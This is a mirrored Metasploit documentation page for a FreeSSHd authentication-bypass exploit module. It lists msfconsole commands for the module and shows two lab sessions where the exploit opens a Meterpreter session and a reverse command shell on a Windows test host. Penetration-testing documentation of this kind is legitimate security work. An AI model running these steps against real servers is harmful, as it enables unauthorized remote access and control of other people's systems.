CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md
Views: 1904

Description

This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

Verification

  1. Start msfconsole

  2. Do : use exploit/windows/ssh/freesshd_authbypass

  3. Do : set RHOST [target IP]

  4. Do : set PAYLOAD [valid windows payload] if you want to use other payloads (windows/meterpreter/reverse_tcp by default)

  5. Do : set LHOST [Your IP]

  6. Do : set LPORT [valid port] (port is 4444 by default)

  7. Do : exploit

  8. If target is vulnerable, a shell (meterpreter by default) should pop

Example with default payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800

meterpreter > sysinfo
Computer        : SSH-TEST-SERVER
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

Example with plain old reverse shell (windows/shell_reverse_tcp)

msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800



C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
   IPv4 Address. . . . . . . . . . . : 192.168.80.131
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER

C:\Windows\system32>